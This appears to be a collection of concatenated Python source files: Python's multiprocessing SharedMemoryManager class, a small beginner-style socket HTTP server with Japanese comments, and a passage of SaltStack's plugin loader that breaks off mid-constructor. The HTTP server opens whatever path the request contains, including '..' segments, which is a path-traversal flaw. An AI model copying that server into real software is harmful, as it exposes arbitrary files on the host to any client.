class SharedMemoryManager(BaseManager):
"""Like SyncManager but uses SharedMemoryServer instead of Server.
It provides methods for creating and returning SharedMemory instances
and for creating a list-like object (ShareableList) backed by shared
memory. It also provides methods that create and return Proxy Objects
that support synchronization across processes (i.e. multi-process-safe
locks and semaphores).
"""
_Server = SharedMemoryServer
def __init__(self, *args, **kwargs):
if os.name == "posix":
# bpo-36867: Ensure the resource_tracker is running before
# launching the manager process, so that concurrent
# shared_memory manipulation both in the manager and in the
# current process does not create two resource_tracker
# processes.
from . import resource_tracker
resource_tracker.ensure_running()
BaseManager.__init__(self, *args, **kwargs)
util.debug(f"{self.__class__.__name__} created by pid {getpid()}")
def __del__(self):
util.debug(f"{self.__class__.__name__}.__del__ by pid {getpid()}")
pass
def get_server(self):
'Better than monkeypatching for now; merge into Server ultimately'
if self._state.value != State.INITIAL:
if self._state.value == State.STARTED:
raise ProcessError("Already started SharedMemoryServer")
elif self._state.value == State.SHUTDOWN:
raise ProcessError("SharedMemoryManager has shut down")
else:
raise ProcessError(
"Unknown state {!r}".format(self._state.value))
return self._Server(self._registry, self._address,
self._authkey, self._serializer)
def SharedMemory(self, size):
"""Returns a new SharedMemory instance with the specified size in
bytes, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sms = shared_memory.SharedMemory(None, create=True, size=size)
try:
dispatch(conn, None, 'track_segment', (sms.name,))
except BaseException as e:
sms.unlink()
raise e
return sms
def ShareableList(self, sequence):
"""Returns a new ShareableList instance populated with the values
from the input sequence, to be tracked by the manager."""
with self._Client(self._address, authkey=self._authkey) as conn:
sl = shared_memory.ShareableList(sequence)
try:
dispatch(conn, None, 'track_segment', (sl.shm.name,))
except BaseException as e:
sl.shm.unlink()
raise e
return sl
|
httpserver.py
|
import socket
import threading
import re
import os
HOST = 'localhost';
PORT = 3333;
BUFSIZE = 4096;
#http ヘッダー群
LINE = '\n';
HTTP_200_STATUS = 'HTTP/1.0 200 OK\n';
HTTP_404_STATUS = 'HTTP/1.0 404 Not Found\n';
SERVER_NAME = 'Server: Python Http Server\n';
CONTENT_TYPE = 'Content-Type: text/html; charset=UTF-8\n'
def http_listen(client, path):
if os.path.isfile(path):
body = open(path);
msg = LINE + HTTP_200_STATUS + SERVER_NAME + CONTENT_TYPE + LINE + body.read();
else:
msg = LINE + HTTP_404_STATUS + SERVER_NAME + CONTENT_TYPE + LINE;
client.sendall(msg.encode('utf-8'));
client.close();
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM); #ソケットを作成
server.bind((HOST, PORT)); #ソケットにホストとポートを割り当て
server.listen(); #接続準備
while True:
print("Receiving a requenst");
client, addr = server.accept(); #受信中
print("Connectiong from: "+addr[0]);
data = client.recv(BUFSIZE);
path = re.search(rb'/[\w\./%]*', data); #HTTPリクエストからpathを抽出したかった
path = "." + path.group().decode('utf-8');
thred = threading.Thread(target=http_listen, args=(client, path)); #マルチスレッドの起動
thred.start(); #実行
|
loader.py
|
"""
The Salt loader is the core to Salt's plugin system, the loader scans
directories for python loadable code and organizes the code into the
plugin interfaces used by Salt.
"""
import contextvars
import copy
import functools
import importlib.machinery # pylint: disable=no-name-in-module,import-error
import importlib.util # pylint: disable=no-name-in-module,import-error
import inspect
import logging
import os
import re
import sys
import tempfile
import threading
import time
import traceback
import types
from collections.abc import MutableMapping
from zipimport import zipimporter
import salt.config
import salt.defaults.events
import salt.defaults.exitcodes
import salt.loader_context
import salt.syspaths
import salt.utils.args
import salt.utils.context
import salt.utils.data
import salt.utils.dictupdate
import salt.utils.event
import salt.utils.files
import salt.utils.lazy
import salt.utils.odict
import salt.utils.platform
import salt.utils.stringutils
import salt.utils.versions
from salt.exceptions import LoaderError
from salt.ext import six
from salt.ext.six.moves import reload_module
from salt.template import check_render_pipe_str
from salt.utils.decorators import Depends
try:
import pkg_resources
HAS_PKG_RESOURCES = True
except ImportError:
HAS_PKG_RESOURCES = False
log = logging.getLogger(__name__)
SALT_BASE_PATH = os.path.abspath(salt.syspaths.INSTALL_DIR)
LOADED_BASE_NAME = "salt.loaded"
# pylint: disable=no-member
MODULE_KIND_SOURCE = 1
MODULE_KIND_COMPILED = 2
MODULE_KIND_EXTENSION = 3
MODULE_KIND_PKG_DIRECTORY = 5
SUFFIXES = []
for suffix in importlib.machinery.EXTENSION_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_EXTENSION))
for suffix in importlib.machinery.SOURCE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_SOURCE))
for suffix in importlib.machinery.BYTECODE_SUFFIXES:
SUFFIXES.append((suffix, "rb", MODULE_KIND_COMPILED))
MODULE_KIND_MAP = {
MODULE_KIND_SOURCE: importlib.machinery.SourceFileLoader,
MODULE_KIND_COMPILED: importlib.machinery.SourcelessFileLoader,
MODULE_KIND_EXTENSION: importlib.machinery.ExtensionFileLoader,
}
# pylint: enable=no-member
PY3_PRE_EXT = re.compile(r"\.cpython-{}{}(\.opt-[1-9])?".format(*sys.version_info[:2]))
# Because on the cloud drivers we do `from salt.cloud.libcloudfuncs import *`
# which simplifies code readability, it adds some unsupported functions into
# the driver's module scope.
# We list un-supported functions here. These will be removed from the loaded.
# TODO: remove the need for this cross-module code. Maybe use NotImplemented
LIBCLOUD_FUNCS_NOT_SUPPORTED = (
"parallels.avail_sizes",
"parallels.avail_locations",
"proxmox.avail_sizes",
)
# Will be set to pyximport module at runtime if cython is enabled in config.
pyximport = None
def static_loader(
opts,
ext_type,
tag,
pack=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
filter_name=None,
):
funcs = LazyLoader(
_module_dirs(
opts, ext_type, tag, int_type, ext_dirs, ext_type_dirs, base_path,
),
opts,
tag=tag,
pack=pack,
)
ret = {}
funcs._load_all()
if filter_name:
funcs = FilterDictWrapper(funcs, filter_name)
for key in funcs:
ret[key] = funcs[key]
return ret
def _format_entrypoint_target(ep):
"""
Makes a string describing the target of an EntryPoint object.
Base strongly on EntryPoint.__str__().
"""
s = ep.module_name
if ep.attrs:
s += ":" + ".".join(ep.attrs)
return s
def _module_dirs(
opts,
ext_type,
tag=None,
int_type=None,
ext_dirs=True,
ext_type_dirs=None,
base_path=None,
):
if tag is None:
tag = ext_type
sys_types = os.path.join(base_path or SALT_BASE_PATH, int_type or ext_type)
ext_types = os.path.join(opts["extension_modules"], ext_type)
ext_type_types = []
if ext_dirs:
if ext_type_dirs is None:
ext_type_dirs = "{}_dirs".format(tag)
if ext_type_dirs in opts:
ext_type_types.extend(opts[ext_type_dirs])
if HAS_PKG_RESOURCES and ext_type_dirs:
for entry_point in pkg_resources.iter_entry_points(
"salt.loader", ext_type_dirs
):
try:
loaded_entry_point = entry_point.load()
for path in loaded_entry_point():
ext_type_types.append(path)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Error getting module directories from %s: %s",
_format_entrypoint_target(entry_point),
exc,
)
log.debug(
"Full backtrace for module directories error", exc_info=True
)
cli_module_dirs = []
# The dirs can be any module dir, or a in-tree _{ext_type} dir
for _dir in opts.get("module_dirs", []):
# Prepend to the list to match cli argument ordering
maybe_dir = os.path.join(_dir, ext_type)
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
continue
maybe_dir = os.path.join(_dir, "_{}".format(ext_type))
if os.path.isdir(maybe_dir):
cli_module_dirs.insert(0, maybe_dir)
return cli_module_dirs + ext_type_types + [ext_types, sys_types]
def minion_mods(
opts,
context=None,
utils=None,
whitelist=None,
initial_load=False,
loaded_base_name=None,
notify=False,
static_modules=None,
proxy=None,
):
"""
Load execution modules
Returns a dictionary of execution modules appropriate for the current
system by evaluating the __virtual__() function in each module.
:param dict opts: The Salt options dictionary
:param dict context: A Salt context that should be made present inside
generated modules in __context__
:param dict utils: Utility functions which should be made available to
Salt modules in __utils__. See `utils_dirs` in
salt.config for additional information about
configuration.
:param list whitelist: A list of modules which should be whitelisted.
:param bool initial_load: Deprecated flag! Unused.
:param str loaded_base_name: A string marker for the loaded base name.
:param bool notify: Flag indicating that an event should be fired upon
completion of module loading.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
__opts__['grains'] = __grains__
__utils__ = salt.loader.utils(__opts__)
__salt__ = salt.loader.minion_mods(__opts__, utils=__utils__)
__salt__['test.ping']()
"""
# TODO Publish documentation for module whitelisting
if not whitelist:
whitelist = opts.get("whitelist_modules", None)
ret = LazyLoader(
_module_dirs(opts, "modules", "module"),
opts,
tag="module",
pack={"__context__": context, "__utils__": utils, "__proxy__": proxy},
whitelist=whitelist,
loaded_base_name=loaded_base_name,
static_modules=static_modules,
extra_module_dirs=utils.module_dirs if utils else None,
pack_self="__salt__",
)
# Load any provider overrides from the configuration file providers option
# Note: Providers can be pkg, service, user or group - not to be confused
# with cloud providers.
providers = opts.get("providers", False)
if providers and isinstance(providers, dict):
for mod in providers:
# sometimes providers opts is not to diverge modules but
# for other configuration
try:
funcs = raw_mod(opts, providers[mod], ret)
except TypeError:
break
else:
if funcs:
for func in funcs:
f_key = "{}{}".format(mod, func[func.rindex(".") :])
ret[f_key] = funcs[func]
if notify:
with salt.utils.event.get_event("minion", opts=opts, listen=False) as evt:
evt.fire_event(
{"complete": True}, tag=salt.defaults.events.MINION_MOD_REFRESH_COMPLETE
)
return ret
def raw_mod(opts, name, functions, mod="modules"):
"""
Returns a single module loaded raw and bypassing the __virtual__ function
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
testmod = salt.loader.raw_mod(__opts__, 'test', None)
testmod['test.ping']()
"""
loader = LazyLoader(
_module_dirs(opts, mod, "module"),
opts,
tag="rawmodule",
virtual_enable=False,
pack={"__salt__": functions},
)
# if we don't have the module, return an empty dict
if name not in loader.file_mapping:
return {}
loader._load_module(name) # load a single module (the one passed in)
return dict(loader._dict) # return a copy of *just* the funcs for `name`
def metaproxy(opts, loaded_base_name=None):
"""
Return functions used in the meta proxy
"""
return LazyLoader(
_module_dirs(opts, "metaproxy"),
opts,
tag="metaproxy",
loaded_base_name=loaded_base_name,
)
def matchers(opts):
"""
Return the matcher services plugins
"""
return LazyLoader(_module_dirs(opts, "matchers"), opts, tag="matchers")
def engines(opts, functions, runners, utils, proxy=None):
"""
Return the master services plugins
"""
pack = {
"__salt__": functions,
"__runners__": runners,
"__proxy__": proxy,
"__utils__": utils,
}
return LazyLoader(
_module_dirs(opts, "engines"),
opts,
tag="engines",
pack=pack,
extra_module_dirs=utils.module_dirs if utils else None,
)
def proxy(
opts,
functions=None,
returners=None,
whitelist=None,
utils=None,
context=None,
pack_self="__proxy__",
):
"""
Returns the proxy module for this salt-proxy-minion
"""
return LazyLoader(
_module_dirs(opts, "proxy"),
opts,
tag="proxy",
pack={
"__salt__": functions,
"__ret__": returners,
"__utils__": utils,
"__context__": context,
},
extra_module_dirs=utils.module_dirs if utils else None,
pack_self=pack_self,
)
def returners(opts, functions, whitelist=None, context=None, proxy=None):
"""
Returns the returner modules
"""
return LazyLoader(
_module_dirs(opts, "returners", "returner"),
opts,
tag="returner",
whitelist=whitelist,
pack={"__salt__": functions, "__context__": context, "__proxy__": proxy or {}},
)
def utils(opts, whitelist=None, context=None, proxy=proxy, pack_self=None):
"""
Returns the utility modules
"""
return LazyLoader(
_module_dirs(opts, "utils", ext_type_dirs="utils_dirs"),
opts,
tag="utils",
whitelist=whitelist,
pack={"__context__": context, "__proxy__": proxy or {}},
pack_self=pack_self,
)
def pillars(opts, functions, context=None):
"""
Returns the pillars modules
"""
_utils = utils(opts)
ret = LazyLoader(
_module_dirs(opts, "pillar"),
opts,
tag="pillar",
pack={"__salt__": functions, "__context__": context, "__utils__": _utils},
extra_module_dirs=_utils.module_dirs,
pack_self="__ext_pillar__",
)
return FilterDictWrapper(ret, ".ext_pillar")
def tops(opts):
"""
Returns the tops modules
"""
if "master_tops" not in opts:
return {}
whitelist = list(opts["master_tops"].keys())
ret = LazyLoader(
_module_dirs(opts, "tops", "top"), opts, tag="top", whitelist=whitelist,
)
return FilterDictWrapper(ret, ".top")
def wheels(opts, whitelist=None, context=None):
"""
Returns the wheels modules
"""
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "wheel"),
opts,
tag="wheel",
whitelist=whitelist,
pack={"__context__": context},
)
def outputters(opts):
"""
Returns the outputters modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only outputters present in the keyspace
"""
ret = LazyLoader(
_module_dirs(opts, "output", ext_type_dirs="outputter_dirs"),
opts,
tag="output",
)
wrapped_ret = FilterDictWrapper(ret, ".output")
# TODO: this name seems terrible... __salt__ should always be execution mods
ret.pack["__salt__"] = wrapped_ret
return wrapped_ret
def serializers(opts):
"""
Returns the serializers modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only serializers present in the keyspace
"""
return LazyLoader(_module_dirs(opts, "serializers"), opts, tag="serializers",)
def eauth_tokens(opts):
"""
Returns the tokens modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader instance, with only token backends present in the keyspace
"""
return LazyLoader(_module_dirs(opts, "tokens"), opts, tag="tokens",)
def auth(opts, whitelist=None):
"""
Returns the auth modules
:param dict opts: The Salt options dictionary
:returns: LazyLoader
"""
return LazyLoader(
_module_dirs(opts, "auth"),
opts,
tag="auth",
whitelist=whitelist,
pack={"__salt__": minion_mods(opts)},
)
def fileserver(opts, backends):
"""
Returns the file server modules
"""
_utils = utils(opts)
if backends is not None:
if not isinstance(backends, list):
backends = [backends]
# If backend is a VCS, add both the '-fs' and non '-fs' versions to the list.
# Use a set to keep them unique
backend_set = set()
vcs_re = re.compile("^(git|svn|hg)(?:fs)?$")
for backend in backends:
match = vcs_re.match(backend)
if match:
backend_set.add(match.group(1))
backend_set.add(match.group(1) + "fs")
else:
backend_set.add(backend)
backends = list(backend_set)
return LazyLoader(
_module_dirs(opts, "fileserver"),
opts,
tag="fileserver",
whitelist=backends,
pack={"__utils__": _utils},
extra_module_dirs=_utils.module_dirs,
)
def roster(opts, runner=None, utils=None, whitelist=None):
"""
Returns the roster modules
"""
return LazyLoader(
_module_dirs(opts, "roster"),
opts,
tag="roster",
whitelist=whitelist,
pack={"__runner__": runner, "__utils__": utils},
extra_module_dirs=utils.module_dirs if utils else None,
)
def thorium(opts, functions, runners):
"""
Load the thorium runtime modules
"""
pack = {"__salt__": functions, "__runner__": runners, "__context__": {}}
ret = LazyLoader(_module_dirs(opts, "thorium"), opts, tag="thorium", pack=pack)
ret.pack["__thorium__"] = ret
return ret
def states(
opts, functions, utils, serializers, whitelist=None, proxy=None, context=None
):
"""
Returns the state modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
statemods = salt.loader.states(__opts__, None, None)
"""
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "states"),
opts,
tag="states",
pack={
"__salt__": functions,
"__proxy__": proxy or {},
"__utils__": utils,
"__serializers__": serializers,
"__context__": context,
},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
pack_self="__states__",
)
def beacons(opts, functions, context=None, proxy=None):
"""
Load the beacon modules
:param dict opts: The Salt options dictionary
:param dict functions: A dictionary of minion modules, with module names as
keys and funcs as values.
"""
return LazyLoader(
_module_dirs(opts, "beacons"),
opts,
tag="beacons",
pack={"__context__": context, "__salt__": functions, "__proxy__": proxy or {}},
virtual_funcs=[],
)
def log_handlers(opts):
"""
Returns the custom logging handler modules
:param dict opts: The Salt options dictionary
"""
ret = LazyLoader(
_module_dirs(
opts,
"log_handlers",
int_type="handlers",
base_path=os.path.join(SALT_BASE_PATH, "log"),
),
opts,
tag="log_handlers",
)
return FilterDictWrapper(ret, ".setup_handlers")
def ssh_wrapper(opts, functions=None, context=None):
"""
Returns the custom logging handler modules
"""
return LazyLoader(
_module_dirs(
opts,
"wrapper",
base_path=os.path.join(SALT_BASE_PATH, os.path.join("client", "ssh")),
),
opts,
tag="wrapper",
pack={
"__salt__": functions,
# "__grains__": opts.get("grains", {}),
# "__pillar__": opts.get("pillar", {}),
"__context__": context,
},
)
def render(opts, functions, states=None, proxy=None, context=None):
"""
Returns the render modules
"""
if context is None:
context = {}
pack = {
"__salt__": functions,
"__grains__": opts.get("grains", {}),
"__context__": context,
}
if states:
pack["__states__"] = states
if proxy is None:
proxy = {}
pack["__proxy__"] = proxy
ret = LazyLoader(
_module_dirs(opts, "renderers", "render", ext_type_dirs="render_dirs",),
opts,
tag="render",
pack=pack,
)
rend = FilterDictWrapper(ret, ".render")
if not check_render_pipe_str(
opts["renderer"], rend, opts["renderer_blacklist"], opts["renderer_whitelist"]
):
err = (
"The renderer {} is unavailable, this error is often because "
"the needed software is unavailable".format(opts["renderer"])
)
log.critical(err)
raise LoaderError(err)
return rend
def grain_funcs(opts, proxy=None, context=None):
"""
Returns the grain functions
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
grainfuncs = salt.loader.grain_funcs(__opts__)
"""
_utils = utils(opts, proxy=proxy)
pack = {"__utils__": utils(opts, proxy=proxy), "__context__": context}
ret = LazyLoader(
_module_dirs(opts, "grains", "grain", ext_type_dirs="grains_dirs",),
opts,
tag="grains",
extra_module_dirs=_utils.module_dirs,
pack=pack,
)
ret.pack["__utils__"] = _utils
return ret
def _format_cached_grains(cached_grains):
"""
Returns cached grains with fixed types, like tuples.
"""
if cached_grains.get("osrelease_info"):
osrelease_info = cached_grains["osrelease_info"]
if isinstance(osrelease_info, list):
cached_grains["osrelease_info"] = tuple(osrelease_info)
return cached_grains
def _load_cached_grains(opts, cfn):
"""
Returns the grains cached in cfn, or None if the cache is too old or is
corrupted.
"""
if not os.path.isfile(cfn):
log.debug("Grains cache file does not exist.")
return None
grains_cache_age = int(time.time() - os.path.getmtime(cfn))
if grains_cache_age > opts.get("grains_cache_expiration", 300):
log.debug(
"Grains cache last modified %s seconds ago and cache "
"expiration is set to %s. Grains cache expired. "
"Refreshing.",
grains_cache_age,
opts.get("grains_cache_expiration", 300),
)
return None
if opts.get("refresh_grains_cache", False):
log.debug("refresh_grains_cache requested, Refreshing.")
return None
log.debug("Retrieving grains from cache")
try:
serial = salt.payload.Serial(opts)
with salt.utils.files.fopen(cfn, "rb") as fp_:
cached_grains = salt.utils.data.decode(
serial.load(fp_), preserve_tuples=True
)
if not cached_grains:
log.debug("Cached grains are empty, cache might be corrupted. Refreshing.")
return None
return _format_cached_grains(cached_grains)
except OSError:
return None
def grains(opts, force_refresh=False, proxy=None, context=None):
"""
Return the functions for the dynamic grains and the values for the static
grains.
Since grains are computed early in the startup process, grains functions
do not have __salt__ or __proxy__ available. At proxy-minion startup,
this function is called with the proxymodule LazyLoader object so grains
functions can communicate with their controlled device.
.. code-block:: python
import salt.config
import salt.loader
__opts__ = salt.config.minion_config('/etc/salt/minion')
__grains__ = salt.loader.grains(__opts__)
print __grains__['id']
"""
# Need to re-import salt.config, somehow it got lost when a minion is starting
import salt.config
# if we have no grains, lets try loading from disk (TODO: move to decorator?)
cfn = os.path.join(opts["cachedir"], "grains.cache.p")
if not force_refresh and opts.get("grains_cache", False):
cached_grains = _load_cached_grains(opts, cfn)
if cached_grains:
return cached_grains
else:
log.debug("Grains refresh requested. Refreshing grains.")
if opts.get("skip_grains", False):
return {}
grains_deep_merge = opts.get("grains_deep_merge", False) is True
if "conf_file" in opts:
pre_opts = {}
pre_opts.update(
salt.config.load_config(
opts["conf_file"],
"SALT_MINION_CONFIG",
salt.config.DEFAULT_MINION_OPTS["conf_file"],
)
)
default_include = pre_opts.get("default_include", opts["default_include"])
include = pre_opts.get("include", [])
pre_opts.update(
salt.config.include_config(
default_include, opts["conf_file"], verbose=False
)
)
pre_opts.update(
salt.config.include_config(include, opts["conf_file"], verbose=True)
)
if "grains" in pre_opts:
opts["grains"] = pre_opts["grains"]
else:
opts["grains"] = {}
else:
opts["grains"] = {}
grains_data = {}
blist = opts.get("grains_blacklist", [])
funcs = grain_funcs(opts, proxy=proxy, context=context or {})
if force_refresh: # if we refresh, lets reload grain modules
funcs.clear()
# Run core grains
for key in funcs:
if not key.startswith("core."):
continue
log.trace("Loading %s grain", key)
ret = funcs[key]()
if not isinstance(ret, dict):
continue
if blist:
for key in list(ret):
for block in blist:
if salt.utils.stringutils.expr_match(key, block):
del ret[key]
log.trace("Filtering %s grain", key)
if not ret:
continue
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
# Run the rest of the grains
for key in funcs:
if key.startswith("core.") or key == "_errors":
continue
try:
# Grains are loaded too early to take advantage of the injected
# __proxy__ variable. Pass an instance of that LazyLoader
# here instead to grains functions if the grains functions take
# one parameter. Then the grains can have access to the
# proxymodule for retrieving information from the connected
# device.
log.trace("Loading %s grain", key)
parameters = salt.utils.args.get_function_argspec(funcs[key]).args
kwargs = {}
if "proxy" in parameters:
kwargs["proxy"] = proxy
if "grains" in parameters:
kwargs["grains"] = grains_data
ret = funcs[key](**kwargs)
except Exception: # pylint: disable=broad-except
if salt.utils.platform.is_proxy():
log.info(
"The following CRITICAL message may not be an error; the proxy may not be completely established yet."
)
log.critical(
"Failed to load grains defined in grain file %s in "
"function %s, error:\n",
key,
funcs[key],
exc_info=True,
)
continue
if not isinstance(ret, dict):
continue
if blist:
for key in list(ret):
for block in blist:
if salt.utils.stringutils.expr_match(key, block):
del ret[key]
log.trace("Filtering %s grain", key)
if not ret:
continue
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
if opts.get("proxy_merge_grains_in_module", True) and proxy:
try:
proxytype = proxy.opts["proxy"]["proxytype"]
if proxytype + ".grains" in proxy:
if (
proxytype + ".initialized" in proxy
and proxy[proxytype + ".initialized"]()
):
try:
proxytype = proxy.opts["proxy"]["proxytype"]
ret = proxy[proxytype + ".grains"]()
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, ret)
else:
grains_data.update(ret)
except Exception: # pylint: disable=broad-except
log.critical(
"Failed to run proxy's grains function!", exc_info=True
)
except KeyError:
pass
grains_data.update(opts["grains"])
# Write cache if enabled
if opts.get("grains_cache", False):
with salt.utils.files.set_umask(0o077):
try:
if salt.utils.platform.is_windows():
# Late import
import salt.modules.cmdmod
# Make sure cache file isn't read-only
salt.modules.cmdmod._run_quiet('attrib -R "{}"'.format(cfn))
with salt.utils.files.fopen(cfn, "w+b") as fp_:
try:
serial = salt.payload.Serial(opts)
serial.dump(grains_data, fp_)
except TypeError as e:
log.error("Failed to serialize grains cache: %s", e)
raise # re-throw for cleanup
except Exception as e: # pylint: disable=broad-except
log.error("Unable to write to grains cache file %s: %s", cfn, e)
# Based on the original exception, the file may or may not have been
# created. If it was, we will remove it now, as the exception means
# the serialized data is not to be trusted, no matter what the
# exception is.
if os.path.isfile(cfn):
os.unlink(cfn)
if grains_deep_merge:
salt.utils.dictupdate.update(grains_data, opts["grains"])
else:
grains_data.update(opts["grains"])
return salt.utils.data.decode(grains_data, preserve_tuples=True)
# TODO: get rid of? Does anyone use this? You should use raw() instead
def call(fun, **kwargs):
"""
Directly call a function inside a loader directory
"""
args = kwargs.get("args", [])
dirs = kwargs.get("dirs", [])
funcs = LazyLoader(
[os.path.join(SALT_BASE_PATH, "modules")] + dirs,
None,
tag="modules",
virtual_enable=False,
)
return funcs[fun](*args)
def runner(opts, utils=None, context=None, whitelist=None):
"""
Directly call a function inside a loader directory
"""
if utils is None:
utils = {}
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "runners", "runner", ext_type_dirs="runner_dirs"),
opts,
tag="runners",
pack={"__utils__": utils, "__context__": context},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
# TODO: change from __salt__ to something else, we overload __salt__ too much
pack_self="__salt__",
)
def queues(opts):
"""
Directly call a function inside a loader directory
"""
return LazyLoader(
_module_dirs(opts, "queues", "queue", ext_type_dirs="queue_dirs"),
opts,
tag="queues",
)
def sdb(opts, functions=None, whitelist=None, utils=None):
"""
Make a very small database call
"""
if utils is None:
utils = {}
return LazyLoader(
_module_dirs(opts, "sdb"),
opts,
tag="sdb",
pack={
"__sdb__": functions,
"__utils__": utils,
"__salt__": minion_mods(opts, utils=utils),
},
whitelist=whitelist,
extra_module_dirs=utils.module_dirs if utils else None,
)
def pkgdb(opts):
"""
Return modules for SPM's package database
.. versionadded:: 2015.8.0
"""
return LazyLoader(
_module_dirs(opts, "pkgdb", base_path=os.path.join(SALT_BASE_PATH, "spm")),
opts,
tag="pkgdb",
)
def pkgfiles(opts):
"""
Return modules for SPM's file handling
.. versionadded:: 2015.8.0
"""
return LazyLoader(
_module_dirs(opts, "pkgfiles", base_path=os.path.join(SALT_BASE_PATH, "spm")),
opts,
tag="pkgfiles",
)
def clouds(opts):
"""
Return the cloud functions
"""
_utils = salt.loader.utils(opts)
# Let's bring __active_provider_name__, defaulting to None, to all cloud
# drivers. This will get temporarily updated/overridden with a context
# manager when needed.
functions = LazyLoader(
_module_dirs(
opts,
"clouds",
"cloud",
base_path=os.path.join(SALT_BASE_PATH, "cloud"),
int_type="clouds",
),
opts,
tag="clouds",
pack={"__utils__": _utils, "__active_provider_name__": None},
extra_module_dirs=_utils.module_dirs,
)
for funcname in LIBCLOUD_FUNCS_NOT_SUPPORTED:
log.trace(
"'%s' has been marked as not supported. Removing from the "
"list of supported cloud functions",
funcname,
)
functions.pop(funcname, None)
return functions
def netapi(opts):
"""
Return the network api functions
"""
return LazyLoader(_module_dirs(opts, "netapi"), opts, tag="netapi",)
def executors(opts, functions=None, context=None, proxy=None):
"""
Returns the executor modules
"""
if proxy is None:
proxy = {}
if context is None:
context = {}
return LazyLoader(
_module_dirs(opts, "executors", "executor"),
opts,
tag="executor",
pack={"__salt__": functions, "__context__": context, "__proxy__": proxy},
pack_self="__executors__",
)
def cache(opts, serial):
"""
Returns the returner modules
"""
return LazyLoader(
_module_dirs(opts, "cache", "cache"),
opts,
tag="cache",
pack={"__context__": {"serial": serial}},
)
def _generate_module(name):
if name in sys.modules:
return
code = "'''Salt loaded {} parent module'''".format(name.split(".")[-1])
# ModuleType can't accept a unicode type on PY2
module = types.ModuleType(str(name)) # future lint: disable=blacklisted-function
exec(code, module.__dict__)
sys.modules[name] = module
def _mod_type(module_path):
if module_path.startswith(SALT_BASE_PATH):
return "int"
return "ext"
# TODO: move somewhere else?
class FilterDictWrapper(MutableMapping):
"""
Create a dict which wraps another dict with a specific key suffix on get
This is to replace "filter_load"
"""
def __init__(self, d, suffix):
self._dict = d
self.suffix = suffix
def __setitem__(self, key, val):
self._dict[key] = val
def __delitem__(self, key):
del self._dict[key]
def __getitem__(self, key):
return self._dict[key + self.suffix]
def __len__(self):
return len(self._dict)
def __iter__(self):
for key in self._dict:
if key.endswith(self.suffix):
yield key.replace(self.suffix, "")
class LoadedFunc:
"""
The functions loaded by LazyLoader instances using subscript notation
'a[k]' will be wrapped with LoadedFunc.
- Makes sure functions are called with the correct loader's context.
- Provides access to a wrapped func's __global__ attribute
:param func callable: The callable to wrap.
:param dict loader: The loader to use in the context when the wrapped callable is called.
"""
def __init__(self, func, loader):
self.func = func
self.loader = loader
functools.update_wrapper(self, func)
def __getattr__(self, name):
return getattr(self.func, name)
def __call__(self, *args, **kwargs):
if self.loader.inject_globals:
run_func = global_injector_decorator(self.loader.inject_globals)(self.func)
else:
run_func = self.func
return self.loader.run(run_func, *args, **kwargs)
class LoadedMod:
def __init__(self, mod, loader):
"""
Return the wrapped func's globals via this object's __globals__
attribute.
"""
self.mod = mod
self.loader = loader
def __getattr__(self, name):
"""
Run the wrapped function in the loader's context.
"""
attr = getattr(self.mod, name)
if inspect.isfunction(attr) or inspect.ismethod(attr):
return LoadedFunc(attr, self.loader)
return attr
class LazyLoader(salt.utils.lazy.LazyDict):
"""
A pseduo-dictionary which has a set of keys which are the
name of the module and function, delimited by a dot. When
the value of the key is accessed, the function is then loaded
from disk and into memory.
.. note::
Iterating over keys will cause all modules to be loaded.
:param list module_dirs: A list of directories on disk to search for modules
:param dict opts: The salt options dictionary.
:param str tag: The tag for the type of module to load
:param func mod_type_check: A function which can be used to verify files
:param dict pack: A dictionary of function to be packed into modules as they are loaded
:param list whitelist: A list of modules to whitelist
:param bool virtual_enable: Whether or not to respect the __virtual__ function when loading modules.
:param str virtual_funcs: The name of additional functions in the module to call to verify its functionality.
If not true, the module will not load.
:param list extra_module_dirs: A list of directories that will be able to import from
:param str pack_self: Pack this module into a variable by this name into modules loaded
:returns: A LazyLoader object which functions as a dictionary. Keys are 'module.function' and values
are function references themselves which are loaded on-demand.
# TODO:
- move modules_max_memory into here
- singletons (per tag)
"""
mod_dict_class = salt.utils.odict.OrderedDict
def __init__(
self,
module_dirs,
opts=None,
tag="module",
loaded_base_name=None,
mod_type_check=None,
pack=None,
whitelist=None,
virtual_enable=True,
static_modules=None,
proxy=None,
virtual_funcs=None,
extra_module_dirs=None,
pack_self=None,
): # pylint: disable=W0231
"""
In pack, if any of the values are None they will be replaced with an
empty context-specific dict
"""
self.parent_loader = None
self.inject_globals = {}
self.pack = {} if pack is None else pack
for i in self.pack:
if isinstance(self.pack[i], salt.loader_context.NamedLoaderContext):
self.pack[i] = self.pack[i].value()
if opts is None:
opts = {}
threadsafety = not opts.get("multiprocessing")
self.context_dict = salt.utils.context.ContextDict(threadsafe=threadsafety)
self.opts = self.__prep_mod_opts(opts)
self.pack_self = pack_self
self.module_dirs = module_dirs
self.tag = tag
self._gc_finalizer = None
if loaded_base_name and loaded_base_name != LOADED_BASE_NAME:
